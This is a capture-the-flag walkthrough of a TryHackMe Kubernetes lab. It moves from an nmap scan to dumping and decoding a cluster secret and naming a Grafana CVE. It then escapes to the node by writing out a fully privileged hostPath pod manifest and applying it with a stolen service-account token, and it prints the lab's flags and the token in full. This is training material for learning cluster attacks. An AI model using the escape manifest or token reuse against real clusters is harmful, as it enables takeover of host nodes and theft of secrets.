Insekube (Kubernetes)

Task 1 - Introduction

01. What ports are open? (comma separated)

╭─hnl@hnl ~/Desktop/ctf/tryhackme/insekube  
╰─➤  nmap 10.10.122.48
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-04 00:56 +0630
Nmap scan report for 10.10.122.48
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Task 2 - RCE

01. What is flag 1?

First, we need to test command injection.

And then try to get RCE.

The third stage is to read the flag. Hint said "You will find the flag in an environment variable".

Task 3 - Interacting with kubernetes

When we list pods in namespace, we got only permission error. So, we can check our permission. We can only list kubernetes secrets.

Task 4 - Kubernetes Secrets

01. What is flag 2?

We can view kubernetes secrets using this command.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl get secrets

NAME                    TYPE                                  DATA   AGE
default-token-8bksk     kubernetes.io/service-account-token   3      86d
developer-token-74lck   kubernetes.io/service-account-token   3      86d
secretflag              Opaque                                1      86d
syringe-token-g85mg     kubernetes.io/service-account-token   3      86d

We can list all of the data contained in the secret. But it only show overviews.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl describe secret secretflag

Name:         secretflag
Namespace:    default
Labels:       <none>
Annotations:  <none>

Type:  Opaque

Data
====
flag:  38 bytes

So, we will output with json format.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl get secret secretflag -o 'json'
n'kubectl get secret secretflag -o 'json
{
    "apiVersion": "v1",
    "data": {
        "flag": "ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0="
    },
    "kind": "Secret",
    "metadata": {
        "annotations": {
            "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"data\":{\"flag\":\"ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0=\"},\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"secretflag\",\"namespace\":\"default\"},\"type\":\"Opaque\"}\n"
        },
        "creationTimestamp": "2022-01-06T23:41:19Z",
        "name": "secretflag",
        "namespace": "default",
        "resourceVersion": "562",
        "uid": "6384b135-4628-4693-b269-4e50bfffdf21"
    },
    "type": "Opaque"
}

Decode the base64.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/insekube  
╰─➤  echo 'ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0=' | base64 -d                                                                        1 ↵
flag{df2a636de15108a4dc41135d930d8ec1}

Task 5 - Recon in the cluster

We can see GRAFANA is running on the cluster.

01. What is the version of Grafana running on the machine?

Read the page source using curl command and copy it. Paste back our text editor and find version keyword.

8.3.0-beta2

02. What is the CVE you've found?

CVE-2021-43798

Task 6 - Escape to the node

1. What is root.txt?

Write a yml file referencing this source https://github.com/BishopFox/badPods/blob/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml

cat > privesc.yml <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: ubuntu
    imagePullPolicy: IfNotPresent
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF

Run this yml file.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl apply -f privesc.yml --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Im82QU1WNV9qNEIwYlV3YnBGb1NXQ25UeUtmVzNZZXZQZjhPZUtUb21jcjQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjgwNTQ3OTE5LCJpYXQiOjE2NDkwMTE5MTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJncmFmYW5hLTU3NDU0Yzk1Y2ItdjRucmsiLCJ1aWQiOiJmMmJkMTczZS1iNjU3LTQyNTMtYTM2NC1lNzA5ZDczMWZhMTIifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRldmVsb3BlciIsInVpZCI6IjE5NjdmYzMwLTQxYjktNDJjZC1hZGI3LWZhYjZkYWUxNDhmNiJ9LCJ3YXJuYWZ0ZXIiOjE2NDkwMTU1MjZ9LCJuYmYiOjE2NDkwMTE5MTksInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRldmVsb3BlciJ9.bz4i0E7tlDHuFjIJW5_gWmlFRHovNYuUdUrxk-DJI1PL7CnYJMPeCxgo-GfHVFKuR3lmB9RAyBQrXA2l4mtaycJ3QvnF_okHshWZyuSLqSm7KUJ0MYwLeLg1GAEr4vu5jSW71mPxUYCQHO6-evu3YtrDSU8iMZnB01g3UPqFMVGlfzFrLUGLs3KRVRlvN6lxL8iSeV4CGCkzkVVqvTY6dtuHyAy0FI-i8LtFDUvKSTGCQtZVUq2-n7-jvpZZomDXGoYGegqIVrU4z8rEP5g7pPyjIKABQWQeh8EgxdE3Uc3SwMjkAxxM2sSH-2Mc0w2W2L9KvQcReEv9NhWjBeyLGw
<gxdE3Uc3SwMjkAxxM2sSH-2Mc0w2W2L9KvQcReEv9NhWjBeyLGw
pod/everything-allowed-exec-pod created

Check if it is running or not.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl get pods --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Im82QU1WNV9qNEIwYlV3YnBGb1NXQ25UeUtmVzNZZXZQZjhPZUtUb21jcjQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjgwNTQ3OTE5LCJpYXQiOjE2NDkwMTE5MTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJncmFmYW5hLTU3NDU0Yzk1Y2ItdjRucmsiLCJ1aWQiOiJmMmJkMTczZS1iNjU3LTQyNTMtYTM2NC1lNzA5ZDczMWZhMTIifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRldmVsb3BlciIsInVpZCI6IjE5NjdmYzMwLTQxYjktNDJjZC1hZGI3LWZhYjZkYWUxNDhmNiJ9LCJ3YXJuYWZ0ZXIiOjE2NDkwMTU1MjZ9LCJuYmYiOjE2NDkwMTE5MTksInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRldmVsb3BlciJ9.bz4i0E7tlDHuFjIJW5_gWmlFRHovNYuUdUrxk-DJI1PL7CnYJMPeCxgo-GfHVFKuR3lmB9RAyBQrXA2l4mtaycJ3QvnF_okHshWZyuSLqSm7KUJ0MYwLeLg1GAEr4vu5jSW71mPxUYCQHO6-evu3YtrDSU8iMZnB01g3UPqFMVGlfzFrLUGLs3KRVRlvN6lxL8iSeV4CGCkzkVVqvTY6dtuHyAy0FI-i8LtFDUvKSTGCQtZVUq2-n7-jvpZZomDXGoYGegqIVrU4z8rEP5g7pPyjIKABQWQeh8EgxdE3Uc3SwMjkAxxM2sSH-2Mc0w2W2L9KvQcReEv9NhWjBeyLGw
<gxdE3Uc3SwMjkAxxM2sSH-2Mc0w2W2L9KvQcReEv9NhWjBeyLGw
NAME                          READY   STATUS    RESTARTS       AGE
everything-allowed-exec-pod   1/1     Running   0              55s
grafana-57454c95cb-v4nrk      1/1     Running   10 (62d ago)   86d
syringe-79b66d66d7-7mxhd      1/1     Running   1 (62d ago)    62d

Login to the container.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl exec -it everything-allowed-exec-pod  --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Im82QU1WNV9qNEIwYlV3YnBGb1NXQ25UeUtmVzNZZXZQZjhPZUtUb21jcjQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjgwNTQ3OTE5LCJpYXQiOjE2NDkwMTE5MTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJncmFmYW5hLTU3NDU0Yzk1Y2ItdjRucmsiLCJ1aWQiOiJmMmJkMTczZS1iNjU3LTQyNTMtYTM2NC1lNzA5ZDczMWZhMTIifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRldmVsb3BlciIsInVpZCI6IjE5NjdmYzMwLTQxYjktNDJjZC1hZGI3LWZhYjZkYWUxNDhmNiJ9LCJ3YXJuYWZ0ZXIiOjE2NDkwMTU1MjZ9LCJuYmYiOjE2NDkwMTE5MTksInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRldmVsb3BlciJ9.bz4i0E7tlDHuFjIJW5_gWmlFRHovNYuUdUrxk-DJI1PL7CnYJMPeCxgo-GfHVFKuR3lmB9RAyBQrXA2l4mtaycJ3QvnF_okHshWZyuSLqSm7KUJ0MYwLeLg1GAEr4vu5jSW71mPxUYCQHO6-evu3YtrDSU8iMZnB01g3UPqFMVGlfzFrLUGLs3KRVRlvN6lxL8iSeV4CGCkzkVVqvTY6dtuHyAy0FI-i8LtFDUvKSTGCQtZVUq2-n7-jvpZZomDXGoYGegqIVrU4z8rEP5g7pPyjIKABQWQeh8EgxdE3Uc3SwMjkAxxM2sSH-2Mc0w2W2L9KvQcReEv9NhWjBeyLGw -- /bin/bash
<AxxM2sSH-2Mc0w2W2L9KvQcReEv9NhWjBeyLGw -- /bin/bash
Unable to use a TTY - input is not a terminal or the right kind of file
whoami
root

Find the root flag.

find / -type f -name root.txt 2>/dev/null
/host/root/root.txt
cat /host/root/root.txt
flag{30180a273e7da821a7fe4af22ffd1701}